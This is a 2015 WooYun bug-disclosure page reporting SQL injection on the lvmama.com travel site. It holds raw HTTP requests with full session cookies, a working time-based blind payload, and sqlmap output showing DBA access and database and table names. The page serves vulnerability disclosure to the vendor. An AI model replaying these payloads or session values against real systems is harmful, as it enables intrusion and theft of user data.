当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148565

漏洞标题:驴妈妈旅游网主站SQL注入漏洞3枚(DBA权限/可获取用户邮箱信息)

相关厂商:驴妈妈旅游网

漏洞作者: Xmyth_Xi2oMin9

提交时间:2015-10-22 11:19

修复时间:2015-12-07 10:08

公开时间:2015-12-07 10:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-22: 细节已通知厂商并且等待厂商处理中
2015-10-23: 厂商已经确认,细节仅向厂商公开
2015-11-02: 细节向核心白帽子及相关领域专家公开
2015-11-12: 细节向普通白帽子公开
2015-11-22: 细节向实习白帽子公开
2015-12-07: 细节向公众公开

简要描述:

2333333333333333

详细说明:

1.png


插入弹幕有XSS 这个洞就不提了

POST /zt/promo/danmu/ HTTP/1.1
Host: www.lvmama.com
Proxy-Connection: keep-alive
Content-Length: 33
Cache-Control: max-age=0
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://www.lvmama.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.lvmama.com/zt/promo/danmu/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: uid=wKgKb1YmG41UxnaZAz1HAg==; CoreID6=73792798625714453379994&ci=90409730; _lvTrack_UUID=2FFA9A78-2338-4BE4-9448-F079CDDCEA4A; lvsessionid=10cc77ba-c541-407f-b955-3000288e680d_10732828; ip_from_place_id=1; ip_from_place_name=""; ip_area_location=BJ; ip_location=114.252.85.120; ip_province_place_id=110000; ip_city_place_id=110000; ip_city_name=%E5%8C%97%E4%BA%AC; cmTPSet=Y; Rvyz72RO3yiChuCn=VXoKRFQXefZ11UgBCh%2Ba17nfvAnVQx%2Fe2h1MWVQUgEYjunh4%2B15JCQWVJdDdpWT1ct0iUs1Sb1nvO0cDrjGwv0Ksxa3saz7EGMfuNJ3YLez3yXbkf7ldHpDDDlARpncIbXcVWZSm4HXMqaXr%2B5UCvPIkaPWtB0XwXyRfld7xdxmOco7E4iEp8elYthMSx4ZgpxCIz5dk%2F7qX7gT5C%2FDEoK1HD2W7YuogWlYXKFpF9Muzi9s%2BkyAEAYuMHBhE%2FwqqsaJm4SGd2eILPF4N5TZIyerk9pthW9A3ijoEMaEGzxKL2hoLQZkSCdwtKvKMoEtBuNo%2FCezPQs8GEPiI1TlrTxRU1y4maUHI6mvX8WhRkMXnn0NFTpVsKBU2YZ0%2BDKlFFGraEmFB4KOKTuwnEycKaqzYWcQOVW2Z%2FS7GXJD3phJ7VcYr6OtG4q7XAiTr1fjiM2i1uKhUkghXI4PJ9EwFnQ%3D%3Dd14bfa38b51b2cfd975fd30b5333949444fcb041; CASTGC=TGC-20-35YOKYZz175Z9pIvPae33gKUBuVWe9AOswh0bno5MJZ0b1Fs3N; UN=mtestqingyouawlk%5E%21%5E4028b25b5024472e01502b7213020a7b; unUserName=mtestqingyouawlk; LSTA=792dda8547d49ad39f58801a348ac4a5; ticket=ST-21-XvRElwFkrCc5RU0wtHLM; PHPSESSID=1ej606m4aqb7i14vgtd283gf54; JSESSIONID=ACC7233ED8586CB9BAEBBE8B4328479D; _lvTrack_sessionID=3E02F023-B233-4F75-AB01-1C508A6E4CC8; __xsptplus443=443.2.1445342148.1445342431.2%234%7C%7C%7C%7C%7C%23%236dkKcTYNgbppp6W25L04rOaARXBuV7E0%23; SYEkW4hMTqJfaGco=sdXp4Mhzo6qwPERvY3TgpvoUKJmzCuIT1wIx7rZ%2FuQUgp6nDCq8dv6r2H%2FGaqhYoLGaGO7wzvMFb9rRmPImowEaJbTHgIh5fAlgebg%2B%2F6hbvjYh1CL8956eDk8GQ5xX10LNm5QdROO3e1KZ2ZEyTOvqT14ymE9wtOOf7a%2BP9i%2FRyPa5kLBmBXwhg6rPOPrFsWfLLAb4O6HNT%2FSDUtzW%2Bmu0xi0jSlY8Nogbcjq7ZkSDkvJcNvzSLcRsgHbFBvHXSUDRvyb8LnwS5zZu9X5ltqFxaltm7%2BcOGvaRNr7aapAoe9olygZm58UWSd5q4e9vrM5GTcS3lFR1S5J82FGwPegOec2u20QedXd90wEu2vpdJaiS0D6IDEbTrgyjqwJmmV8Y3d6srCQoZQb1SZldXmPLKfwH0knjAXeUqPjCVteJ%2F7fzGqZTnOLDigngwKCJnwFvtw1cKbw98fWlllbk5iw%3D%3D16b0bd096bc4c36e1eafd93d198e61db2aa4ed89; oUC=018115; oUT=0920; 90409730_clogin=v=1&l=1445337999&e=1445344828489; _gscu_1059159971=45342709lr7tio48; _gscs_1059159971=453427090986yb48|pv:12; _gscbrs_1059159971=1; jXVJUTNgMEfp6rEr=zaGqbEIa86gylAizLLHnMPStnjkdv%2Fp2MkA6DvSIAZY6SEHkT6hj4EFDgfPTq5of3WzxHWnQEkn%2FlXubCrG%2Bk9tMXGmGiKMwDftPpqt0Sw5YL%2FkQrLis8NOhmniuC3hvMYi4sxtJdJ0HWq3QwGbV8DzH7BraZPKXoqbyhfDoV6jYFyRR1Cu7uy7jOuFw%2BKccv6gqtxlZlwSVDI4sPIZbpJUZLkXLHDvi6hlt9lSV5r1eqxIaL%2FRjkwD%2B7%2B5VVzB8CIA5pM7HMZTnrJl5s22Tfvb47bfOV1s7xzpguFCbNAptoNhpqi5lPtjCNLpVzRZJZ9afNCrPluKbqTA0ggoUX6ZbYa3jVYzhevuEakaF%2BMJ%2F%2BsjT78Mdf0A3JlMd0OdsNWyPBVr92tJ0noJDGiQZ%2FUQXp7kRJ%2Beanjex5ks9T%2FDyo8z6qK8%2FMNiWnnB76mz1LOiJf8bPa%2BHytMQTEx%2B1Dw%3D%3D6c863c004a84778026ff4ca24e0ad5c96a4c4d53; 90409730_clogin=v=1&l=1445337999&e=1445345299529; bqeRoYZ7gjxuUl7T=pzaCs5YtoNVXOThwIMmm7JbR58qQ7jqUTfpyqq6KkymwpIVpOVyR18TE%2FHohmFctcZ6BBa%2FaviDJOggu4DuB8%2FQj1jtm3dxbkx5pt6DNZjgip%2FJcd7AvKsb%2FNe4G54f36PtlDNlQ0Z%2BMpLektsTpt7xUuHpjO%2Bt2JluZeRoghqaUHm%2FdRqpDJ%2FPxpLmTOrknN8AsZCneomi05UlAEMDP4s8L1T3RyONcXTh0WG9T9xZ%2FcmiP%2BkHYU6ap7TA1n3szf%2FMPkDmJKxLhFXIAPv67JRXX71MQPFPDR1lvjSTlg5viznY6iidSDC5Vs6OGEmR0PKZ68UDlX%2Bp6aEOLRRVDfGwAVOTiYYrZtlhKmxVN7jtSxfuSOhkuUsirW0NAQOP11xra0gDTu9HQ3e9iEpYSkQ9rMXRkkTs1zW0vWCI3FeSsnEcRxN4x0K%2F85iiHd3IuwceJxq%2F2gc2aKZkoyS0HNQ%3D%3Da3548bfc544b25d14b07a55d40514cea8a9eb7b9; __utma=30114658.888273037.1445337999.1445337999.1445342550.2; __utmb=30114658.50.9.1445342936968; __utmc=30114658; __utmz=30114658.1445342550.2.2.utmcsr=baidu|utmccn=(organic)|utmcmd=organic; Hm_lvt_cb09ebb4692b521604e77f4bf0a61013=1445343392,1445343416,1445343483,1445343510; Hm_lpvt_cb09ebb4692b521604e77f4bf0a61013=1445343510; bfd_s=30114658.43119232.1445338000030; tmc=61.30114658.26110505.1445338000053.1445343485936.1445343511496; tma=30114658.26110505.1445338000053.1445338000053.1445338000053.1; tmd=61.30114658.26110505.1445338000053.; bfd_g=b26decf4bbcd4bec000062be0002729d56261b8f
ac=ajaxFootmark&flag=hand&city=xz

漏洞证明:

数据库:

available databases [18]:
[*] info
[*] infonews
[*] information_schema
[*] lmm_core
[*] lmm_customization
[*] lmm_guide
[*] lmm_logs
[*] lmm_lvyou
[*] lmm_message
[*] lmm_module
[*] lmm_subject
[*] lmm_subjects2
[*] lmm_weather
[*] lvmamabus
[*] minitite
[*] mysql
[*] others
[*] post_robot


Database: lmm_subject
[59 tables]
+--------------------------+
| sj_hasterkong_mobile    |
| sj_prize_users          |
| sj_wl{_benqituijiqn      |
| sj_zhenjia[s;jiao@in     |
| sj_2015shujia_dianzan    |
| sj_@hiyicomment_users    |
| sj_ads_jeep_member       |
| sj_atlantica             |
| sj_auction_order         |
| sj_auction_product_price |
| sj_auction_reduce        |
| sj_birthday_info         |
| sj_chunjie6_users        |
| sj_cyh_member            |
| sj_dianzan               |
| sj_dms_inventory         |
| sj_dmsuserandphone       |
| sj_elysee_users          |
| sj_ford_app_form         |
| sj_ford_declaration      |
| sj_ford_user             |
| sj_free_tour_application |
| sj_free_tour_destination |
| sj_free_tour_emailPhone  |
| sj_free_tour_products    |
| sj_free_tour_users       |
| sj_holidaylnn_hmg        |
| sj_holidaylnn_userinfo   |
| sj_hubei_cotpon          |
| sj_hubei_info            |
| sj_hubei_wantgo          |
| sj_ji_coupons            |
| sj_lingshan_user         |
| sj_lkgame                |
| sj_lvxingzhezhaomu       |
| sj_lvyouri_users         |
| sj_mini_huangshan_form   |
| sj_misspanda_img         |
| sj_name@honeemail        |
| sj_photoclub_member      |
| sj_photogra@h_works      |
| sj_postcard              |
| sj_postcard_product      |
| sj_project               |
| sj_qhngrenjie_2015       |
| sj_raid_userinfo         |
| sj_s@ring_coins          |
| sj_sanya                 |
| sj_sheshan_info          |
| sj_showgamd              |
| sj_spring_coins_records  |
| sj_tiya@                 |
| sj_water_pk              |
| sj_water_user            |
| sj_water_works           |
| sj_yingli                |
| sj_ytz_works             |
| sj_zero_user             |
| sj_zhounian_info         |
+--------------------------+

1.png


权限:

you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: city (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: ac=ajaxFootmark&flag=hand&city=xz' AND (SELECT * FROM (SELECT(SLEEP(5)))aaDD) AND 'wnzJ'='wnzJ
---
[10:08:31] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
[10:08:31] [INFO] testing if current user is DBA
[10:08:31] [INFO] fetching current user
[10:08:31] [INFO] resumed: [email protected]
current user is DBA:    True
[10:08:31] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\www.lvmama.com'
[*] shutting down at 10:08:31


其他:

POST /trip/show/ajaxHover HTTP/1.1
Host: www.lvmama.com
Proxy-Connection: keep-alive
Content-Length: 28
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://www.lvmama.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://www.lvmama.com/trip/show/64453?ticket=ST-3538-adOXjbbb51LMjh0TjCa9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: uid=wKgKcFYnYfgFCi7EBrs9Ag==; CoreID6=17844795529714454215648&ci=90409730; _lvTrack_UUID=963A3870-BFF1-4869-AF3A-7D680E1303AA; floatRcookie=floatRcookie; oUC=017878065532; oUT=09210921; CoreID6=17844795529714454215648&ci=90409730_99999999; TUANGOU_DETAIL_PRODUCTID=%5B%7B%22imageUrl%22%3A%22http%3A%2F%2Fpic.lvmama.com%2F%2Fuploads%2Fpc%2Fplace2%2F2015-07-28%2Fcefeb9e6-5e17-4f86-bfe4-3da80c05e49a.jpg%22%2C%22name%22%3A%22%E3%80%9010.24%E5%94%90%E9%A3%8E%E6%B8%A9%E6%B3%892%E5%A4%A91%E6%99%9A199%E5%85%83%EF%BC%8F%E4%BA%BA%E8%87%AA%E9%A9%BE%E7%89%B9%E5%8D%96%E3%80%91%E4%BD%8F%E5%94%90%E9%A3%8E%E6%B8%A9%E6%B3%89%E5%BA%A6%E5%81%87%E6%9D%91%E5%86%85%E4%B8%89%E6%9C%9F%E6%96%B0%E5%AE%A2%E6%88%BF%E8%B1%AA%E5%8D%8E%E4%B8%AD%E5%BC%8F%E6%A0%87%E9%97%B4%EF%BC%8C%E6%B3%A1%E5%94%90%E9%A3%8E%E6%B8%A9%E6%B3%89%E3%80%81%E7%8E%A9%E6%AD%A6%E4%B9%89%E5%A4%A7%E7%BA%A2%E5%B2%A9%E6%99%AF%E5%8C%BA%EF%BC%88%E8%B5%A0%EF%BC%9A%E6%B9%96%E7%95%94%E8%A5%BF%E9%A4%90%E5%8E%85%E8%87%AA%E5%8A%A9%E6%97%A9%EF%BC%89%22%2C%22placeId%22%3A%22http%3A%2F%2Fwww.lvmama.com%2Ftuangou%2Fdeal-565869%22%2C%22productsPrice%22%3A%22199%22%7D%2C%7B%22imageUrl%22%3A%22http%3A%2F%2Fpic.lvmama.com%2F%2Fuploads%2Fpc%2Fplace2%2F2015-10-09%2F4fe813c2-33f4-484d-a0b1-9db943e67b5e.jpg%22%2C%22name%22%3A%22%E3%80%9010%EF%BC%8F31%E5%8D%97%E5%8C%97%E6%B9%96%E6%B9%96%E7%BE%8A%E8%8A%82199%E5%85%83%EF%BC%8F%E4%BA%BA+%E8%B7%9F%E9%98%9F%E8%87%AA%E9%A9%BE%E7%89%B9%E5%8D%96%E3%80%91%E6%B5%B7%E5%88%A9%E5%BC%80%E5%85%83%E5%90%8D%E9%83%BD%E9%85%92%E5%BA%97%EF%BC%8B%E5%8D%97%E5%8C%97%E6%B9%96%EF%BC%88%E5%90%83%E6%B9%96%E7%BE%8A%E8%82%89%E5%96%9D%E6%B2%88%E8%8D%A1%E9%BB%84%E9%85%92%EF%BC%8B%E6%A9%98%E5%AD%90%E9%87%87%E6%91%98%EF%BC%8B%E7%BB%AE%E5%9B%AD%E9%A3%8E%E6%99%AF%E5%8C%BA%EF%BC%8B%E6%B5%B7%E5%A4%A9%E4%B8%80%E6%B4%B2%E8%87%AA%E5%8A%A9%E4%B8%AD%E9%A4%90%EF%BC%8B%E9%85%92%E5%BA%97%E8%87%AA%E5%8A%A9%E6%97%A9%EF%BC%8B%E5%81%A5%E8%BA%AB%E6%88%BF%E3%80%81%E6%B8%B8%E6%B3%B3%E6%B1%A0%EF%BC%88%E5%8F%8C%E4%BA%BA%E8%B5%B7%E8%AE%A2%EF%BC%81%EF%BC%89%22%2C%22placeId%22%3A%22http%3A%2F%2Fwww.lvmama.com%2Ftuangou%2Fdeal-599559%22%2C%22productsPrice%22%3A%22199%22%7D%5D; cityName=%u5317%u4EAC; stationCode=BJ; stationId=13; stationPinyin=beijing; MY_SPACE_READ_IS_TRUE_40288a8b240a826f0124105606763d4b=true; MY_SPACE_READ_IS_TRUE_ff8080812775c09a012775d2ec640014=true; MY_SPACE_READ_IS_TRUE_ff80808137b74e860137df55073662ac=true; _gscu_1059159971=45432868xpbtfm74; bqeRoYZ7gjxuUl7T=fF6UQYtQzyDHZojMbuUFuQy7l2PI9415WLR4DXFcKHE3tX1j3Ai6w78DxFJM4pyhKQWbu6GzO1Zg%2Fp0Vrg9cDCIvIJ1C8XSRtBeer8mTwSU5VY285LneZqzO3TBEZDSdKwhalmVpzJAWfSImpajwg6F1NfFYoML5As5xZKSbzeWZvYPVELPwCuITyhMiWhBHaKQFAQQ13o9h%2FAbjpFKKCiWveuWER52gFwCy5ssI9biMvv%2Bt692b%2FrSP%2FaMWIZ8giiMZVT2rNyMCX1scBEsrwd3XePFW%2BdS73dtj7Jp3BSI%2BGM%2BMxEdXMGAjsNt38PiksXQ3CQEOTmuoUOP0dXGFKmeOmDVtGlEeHvzJQ2rmfiNF7tSlUtQmlWsobHJD8IlqGo4r8gbQlDmmeYlQPzI01dWcqjmZ9apgoDc56Zrkyhcpo0NgadjB7BSP3emqaOfQLTRkBNQHLHHznlPtO9aNvA%3D%3D12930c02599f0eba334b706cb8bd684ed240a2af; cmTPSet=Y; JSESSIONID=194FD604193C37372872AF0D19026DE2; lvsessionid=3ba0f3f0-14b9-49fb-8d8c-1aa08c17059b_16165402; ip_from_place_id=1; ip_from_place_name=""; ip_area_location=BJ; ip_location=114.252.85.120; ip_province_place_id=110000; ip_city_place_id=110000; ip_city_name=%E5%8C%97%E4%BA%AC; Rvyz72RO3yiChuCn=Yfr3uRff0P5H86hMoNs%2BDYjz%2B4IPsrssghwVSDWlEN2AKE7MZu22DcEbnMYMTd0tr%2FAi9%2FztSQzMuwn6NZ0xG8XS4yrURXlykC0irFPnw71ohYMcgH%2F%2FZaDp%2FwhwwGVpPT1j6B9s7ik1Ynl6S2Vm1k55%2BszKLVhBy4TzHJy2XuSEeqquyc8a1A8DUoNVE3mN3Yjfi7EImE2hAKFo7PfzuN92PaUpi%2BOgiA%2Bp3vLinJ0PeANxGOhT4gV4xn7zIzVmmIlUhF2Jh0UXMa9veyHZr4IZJkeGzkqHgYWPki4qqilswWk0NKCd4EKYkiZ7F5T4TVCSEX%2FUkn3efvi0%2FXigmUd4eYebBs8g3OzQQtlhAkmxqpDdeKQKsKE7qx4geWWG2uM3zTX3JlrvHPslUVVw0MjoNmOoMQ76CsZ2CnDVn9yjx%2BIdcUVzoeb9rPOWyTUoN5X8qni36tiRddur0UT%2FMA%3D%3De3c655ce3ee404690ca183bd470ee14d9b46c8ce; _lvTrack_sessionID=D2673CCB-5907-4C84-9C76-5B1569FD8E11; jXVJUTNgMEfp6rEr=6K80JbJRRTKKYZRt3OsL%2FSG1O6sFBJ6CH83AdZOQNfdsuY7%2BTvk4cMpRvtuNF8LekhPpbWXtR0TKWLuB5tNA%2FIiK2%2FOFSitxD0PiuPFcrKsoYckovNSOHN6P6ECSZ%2BuS9coTrXDySi3Sxb5UNsN0VO20NRnAEBNe7MrEHbH%2FPNiV2MzzuLMurwlzgEDMhXo61h1nJhbuqhIhzVFX1gLJ6fpdTfLMAnz8Cnvm4Wu4nYNLOwSFTvvUh195lPBYJEZiJ9fm%2FTRNEZhY%2Fl3eVA%2FnPt3AN4WjAMioyUpeZi2h5VhCrr7%2FsybDl3hoZkfse%2FNrk4p3TB4cFNpFtM2nBofZ3M5ioJ1fafi%2F212i7b8AUVlGWWBA5gXtmwLMhY81i8afA5waBMJNIKrnB%2FC0FpPXAwX9%2FcwGfLtYRMeHCR2ceFVmmrWJkw%2BS%2BpWiAyv%2BesFrGjWG5z9k4kHN5hivZnsAxw%3D%3D640d44db86f5d1ca6712cc2396d5444f5aeb8157; __xsptplus443=443.2.1445473797.1445473927.10%234%7C%7C%7C%7C%7C%23%23WKkjSfaw_FXpbhINgFke67KTqocGEJLA%23; oIC=062835059324044151056782; oIT=0921092109210922; CASTGC=TGC-3309-0Y0UKe0HVaS8em4qFSfOwolKy759LnX5Q03TNfQgR9zfONP2X6; unUserName=mtestqingyouawlk; LSTA=792dda8547d49ad39f58801a348ac4a5; UN=mtestqingyouawlk%5E%21%5E4028b25b5024472e01502b7213020a7b; __utma=30114658.905894039.1445421565.1445425203.1445473708.3; __utmb=30114658.22.10.1445473708; __utmc=30114658; __utmz=30114658.1445425203.2.2.utmcsr=baidu|utmccn=cpt|utmcmd=zhuanqu|utmctr=lvmama; Hm_lvt_cb09ebb4692b521604e77f4bf0a61013=1445430657,1445473708; Hm_lpvt_cb09ebb4692b521604e77f4bf0a61013=1445473990; bfd_s=30114658.40551760.1445473708423; tmc=24.30114658.50626639.1445473708427.1445473974491.1445473990192; tma=30114658.79531041.1445421565456.1445421565456.1445473708436.2; tmd=204.30114658.79531041.1445421565456.; 90409730_clogin=l=1445473708&v=1&e=1445475791309; 90409730_clogin=l=1445473708&v=1&e=1445475791345; bfd_g=b26decf4bbcd4bec0000629100026278562761fe; aidsbanner=124; countsbanner=1; maxesbanner=10; fidbanner=
dest_id=205661&trip_id=64453


POST /cmt_front/comment/searchReviewAjax HTTP/1.1
Host: www.lvmama.com
Proxy-Connection: keep-alive
Content-Length: 12
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://www.lvmama.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://www.lvmama.com/comment/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=AA8C410D052760BDC3ACBCE88199B7AB; uid=wKgKcFYnYfgFCi7EBrs9Ag==; CoreID6=17844795529714454215648&ci=90409730; _lvTrack_UUID=963A3870-BFF1-4869-AF3A-7D680E1303AA; floatRcookie=floatRcookie; oUC=017878065532; oUT=09210921; CoreID6=17844795529714454215648&ci=90409730_99999999; TUANGOU_DETAIL_PRODUCTID=%5B%7B%22imageUrl%22%3A%22http%3A%2F%2Fpic.lvmama.com%2F%2Fuploads%2Fpc%2Fplace2%2F2015-07-28%2Fcefeb9e6-5e17-4f86-bfe4-3da80c05e49a.jpg%22%2C%22name%22%3A%22%E3%80%9010.24%E5%94%90%E9%A3%8E%E6%B8%A9%E6%B3%892%E5%A4%A91%E6%99%9A199%E5%85%83%EF%BC%8F%E4%BA%BA%E8%87%AA%E9%A9%BE%E7%89%B9%E5%8D%96%E3%80%91%E4%BD%8F%E5%94%90%E9%A3%8E%E6%B8%A9%E6%B3%89%E5%BA%A6%E5%81%87%E6%9D%91%E5%86%85%E4%B8%89%E6%9C%9F%E6%96%B0%E5%AE%A2%E6%88%BF%E8%B1%AA%E5%8D%8E%E4%B8%AD%E5%BC%8F%E6%A0%87%E9%97%B4%EF%BC%8C%E6%B3%A1%E5%94%90%E9%A3%8E%E6%B8%A9%E6%B3%89%E3%80%81%E7%8E%A9%E6%AD%A6%E4%B9%89%E5%A4%A7%E7%BA%A2%E5%B2%A9%E6%99%AF%E5%8C%BA%EF%BC%88%E8%B5%A0%EF%BC%9A%E6%B9%96%E7%95%94%E8%A5%BF%E9%A4%90%E5%8E%85%E8%87%AA%E5%8A%A9%E6%97%A9%EF%BC%89%22%2C%22placeId%22%3A%22http%3A%2F%2Fwww.lvmama.com%2Ftuangou%2Fdeal-565869%22%2C%22productsPrice%22%3A%22199%22%7D%2C%7B%22imageUrl%22%3A%22http%3A%2F%2Fpic.lvmama.com%2F%2Fuploads%2Fpc%2Fplace2%2F2015-10-09%2F4fe813c2-33f4-484d-a0b1-9db943e67b5e.jpg%22%2C%22name%22%3A%22%E3%80%9010%EF%BC%8F31%E5%8D%97%E5%8C%97%E6%B9%96%E6%B9%96%E7%BE%8A%E8%8A%82199%E5%85%83%EF%BC%8F%E4%BA%BA+%E8%B7%9F%E9%98%9F%E8%87%AA%E9%A9%BE%E7%89%B9%E5%8D%96%E3%80%91%E6%B5%B7%E5%88%A9%E5%BC%80%E5%85%83%E5%90%8D%E9%83%BD%E9%85%92%E5%BA%97%EF%BC%8B%E5%8D%97%E5%8C%97%E6%B9%96%EF%BC%88%E5%90%83%E6%B9%96%E7%BE%8A%E8%82%89%E5%96%9D%E6%B2%88%E8%8D%A1%E9%BB%84%E9%85%92%EF%BC%8B%E6%A9%98%E5%AD%90%E9%87%87%E6%91%98%EF%BC%8B%E7%BB%AE%E5%9B%AD%E9%A3%8E%E6%99%AF%E5%8C%BA%EF%BC%8B%E6%B5%B7%E5%A4%A9%E4%B8%80%E6%B4%B2%E8%87%AA%E5%8A%A9%E4%B8%AD%E9%A4%90%EF%BC%8B%E9%85%92%E5%BA%97%E8%87%AA%E5%8A%A9%E6%97%A9%EF%BC%8B%E5%81%A5%E8%BA%AB%E6%88%BF%E3%80%81%E6%B8%B8%E6%B3%B3%E6%B1%A0%EF%BC%88%E5%8F%8C%E4%BA%BA%E8%B5%B7%E8%AE%A2%EF%BC%81%EF%BC%89%22%2C%22placeId%22%3A%22http%3A%2F%2Fwww.lvmama.com%2Ftuangou%2Fdeal-599559%22%2C%22productsPrice%22%3A%22199%22%7D%5D; cityName=%u5317%u4EAC; stationCode=BJ; stationId=13; stationPinyin=beijing; MY_SPACE_READ_IS_TRUE_40288a8b240a826f0124105606763d4b=true; MY_SPACE_READ_IS_TRUE_ff8080812775c09a012775d2ec640014=true; MY_SPACE_READ_IS_TRUE_ff80808137b74e860137df55073662ac=true; _gscu_1059159971=45432868xpbtfm74; bqeRoYZ7gjxuUl7T=fF6UQYtQzyDHZojMbuUFuQy7l2PI9415WLR4DXFcKHE3tX1j3Ai6w78DxFJM4pyhKQWbu6GzO1Zg%2Fp0Vrg9cDCIvIJ1C8XSRtBeer8mTwSU5VY285LneZqzO3TBEZDSdKwhalmVpzJAWfSImpajwg6F1NfFYoML5As5xZKSbzeWZvYPVELPwCuITyhMiWhBHaKQFAQQ13o9h%2FAbjpFKKCiWveuWER52gFwCy5ssI9biMvv%2Bt692b%2FrSP%2FaMWIZ8giiMZVT2rNyMCX1scBEsrwd3XePFW%2BdS73dtj7Jp3BSI%2BGM%2BMxEdXMGAjsNt38PiksXQ3CQEOTmuoUOP0dXGFKmeOmDVtGlEeHvzJQ2rmfiNF7tSlUtQmlWsobHJD8IlqGo4r8gbQlDmmeYlQPzI01dWcqjmZ9apgoDc56Zrkyhcpo0NgadjB7BSP3emqaOfQLTRkBNQHLHHznlPtO9aNvA%3D%3D12930c02599f0eba334b706cb8bd684ed240a2af; cmTPSet=Y; JSESSIONID=194FD604193C37372872AF0D19026DE2; lvsessionid=3ba0f3f0-14b9-49fb-8d8c-1aa08c17059b_16165402; ip_from_place_id=1; ip_from_place_name=""; ip_area_location=BJ; ip_location=114.252.85.120; ip_province_place_id=110000; ip_city_place_id=110000; ip_city_name=%E5%8C%97%E4%BA%AC; _lvTrack_sessionID=D2673CCB-5907-4C84-9C76-5B1569FD8E11; jXVJUTNgMEfp6rEr=6K80JbJRRTKKYZRt3OsL%2FSG1O6sFBJ6CH83AdZOQNfdsuY7%2BTvk4cMpRvtuNF8LekhPpbWXtR0TKWLuB5tNA%2FIiK2%2FOFSitxD0PiuPFcrKsoYckovNSOHN6P6ECSZ%2BuS9coTrXDySi3Sxb5UNsN0VO20NRnAEBNe7MrEHbH%2FPNiV2MzzuLMurwlzgEDMhXo61h1nJhbuqhIhzVFX1gLJ6fpdTfLMAnz8Cnvm4Wu4nYNLOwSFTvvUh195lPBYJEZiJ9fm%2FTRNEZhY%2Fl3eVA%2FnPt3AN4WjAMioyUpeZi2h5VhCrr7%2FsybDl3hoZkfse%2FNrk4p3TB4cFNpFtM2nBofZ3M5ioJ1fafi%2F212i7b8AUVlGWWBA5gXtmwLMhY81i8afA5waBMJNIKrnB%2FC0FpPXAwX9%2FcwGfLtYRMeHCR2ceFVmmrWJkw%2BS%2BpWiAyv%2BesFrGjWG5z9k4kHN5hivZnsAxw%3D%3D640d44db86f5d1ca6712cc2396d5444f5aeb8157; __xsptplus443=443.2.1445473797.1445473927.10%234%7C%7C%7C%7C%7C%23%23WKkjSfaw_FXpbhINgFke67KTqocGEJLA%23; oIC=062835059324044151056782; oIT=0921092109210922; CASTGC=TGC-3309-0Y0UKe0HVaS8em4qFSfOwolKy759LnX5Q03TNfQgR9zfONP2X6; unUserName=mtestqingyouawlk; LSTA=792dda8547d49ad39f58801a348ac4a5; UN=mtestqingyouawlk%5E%21%5E4028b25b5024472e01502b7213020a7b; Hm_lvt_cb09ebb4692b521604e77f4bf0a61013=1445430657,1445473708; Hm_lpvt_cb09ebb4692b521604e77f4bf0a61013=1445473990; bfd_s=30114658.40551760.1445473708423; tmc=24.30114658.50626639.1445473708427.1445473974491.1445473990192; tma=30114658.79531041.1445421565456.1445421565456.1445473708436.2; tmd=204.30114658.79531041.1445421565456.; 90409730_clogin=l=1445473708&v=1&e=1445475791309; 90409730_clogin=l=1445473708&v=1&e=1445475791345; bfd_g=b26decf4bbcd4bec0000629100026278562761fe; aidsbanner=124; countsbanner=1; maxesbanner=10; fidbanner=; Rvyz72RO3yiChuCn=G1XNtkkGQlzMKTObC0EZIpGEwh8CJY86OeK13lfme5rx1BQMsuKMgF8NcXF%2BJxLVlxfWvzHBX3xp%2B8CxfAe5qHT82XCM%2FJl%2F%2FxceNd2Hdqh%2FJkslQEwReG97CzayXu802XHtPCjxGcAdv4Vgsf2fgbdz%2BSGRRvcEh%2B5TXZJdkAGyeXQJ1mUNsawduI9xmilrO17VIi8I1tFvRd1h19nRppkJTnBJ2TqQb6tCTAg1t2a6HzWVwDkBlCcf9WrDdMUyIOHupP%2FYblPWwZHmcoY5WxPiHdMDhmgAwyqQcsUFg00MiD1WxR%2BMrZD0C1Dp89mxiaUAOtwYZH6wktZ6cj5GXXfy8elHE9tt81lEgW6Lg6CLjylmSSWhUfCGzRiq2IZPSIT4yV15UUWz%2B9QSpSZB1ozYSPG6Keh0x8cNImtlnw6OlZ6%2BMvprfAcTzEcNQvHXl2dFlM4osbs6HXhiMAxUOg%3D%3D04d1def27bcb63b6dd99434f7ad929e06eab852b; __utma=30114658.905894039.1445421565.1445425203.1445473708.3; __utmb=30114658.24.10.1445473708; __utmc=30114658; __utmz=30114658.1445425203.2.2.utmcsr=baidu|utmccn=cpt|utmcmd=zhuanqu|utmctr=lvmama
keywords=aaa

修复方案:

时间盲注 等了好久好久好久

版权声明:转载请注明来源 Xmyth_Xi2oMin9@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-10-23 10:06

厂商回复:

thx

最新状态:

暂无